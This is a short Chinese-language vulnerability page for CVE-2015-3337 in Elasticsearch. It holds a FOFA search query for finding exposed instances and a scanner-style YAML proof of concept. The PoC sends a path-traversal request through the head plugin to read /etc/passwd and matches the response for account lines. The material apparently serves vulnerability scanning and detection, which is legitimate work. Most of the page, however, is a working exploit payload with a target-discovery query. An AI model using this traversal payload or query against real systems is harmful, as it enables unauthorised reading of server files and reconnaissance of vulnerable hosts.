CVE-2015-3337: Elasticsearch CVE-2015-3337

日期: 2025-09-01 | 影响软件: Elasticsearch | POC: 已公开

漏洞描述

fofa app="elastic-Elasticsearch"

PoC代码[已公开]

id: CVE-2015-3337

info:
    name: Elasticsearch CVE-2015-3337
    author: X.Yang
    severity: medium
    description: fofa app="elastic-Elasticsearch"

rules:
    r0:
        request:
            method: GET
            path: /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
        expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

相关漏洞推荐